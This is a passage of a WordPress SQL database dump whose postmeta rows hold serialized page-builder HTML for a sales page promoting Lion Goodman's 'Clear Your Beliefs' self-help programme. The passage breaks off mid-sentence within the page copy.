(1555, 2007, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:272;s:6:"height";i:328;s:4:"file";s:14:"2014/12/cb.png";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:14:"cb-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:6:"medium";a:4:{s:4:"file";s:14:"cb-248x300.png";s:5:"width";i:248;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:14:"category-thumb";a:4:{s:4:"file";s:14:"cb-220x220.png";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:9:"image/png";}s:15:"product-preview";a:4:{s:4:"file";s:14:"cb-170x200.png";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(1556, 2007, '_edit_lock', '1418361565:2'),
(1558, 2009, '_edit_lock', '1515178828:2'),
(1559, 2009, '_edit_last', '2'),
(1560, 2009, '_wp_page_template', 'default');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1561, 2009, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:2:"27";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:2:"28";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:2:"29";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:2:"30";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:2:"31";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:2:"32";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:2:"33";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:2:"34";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:2:"35";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"36";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"37";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"38";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"39";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"40";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"41";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"42";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"43";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"44";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"45";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"46";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"47";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"48";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"49";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"50";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"51";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"52";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:60567:"<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for 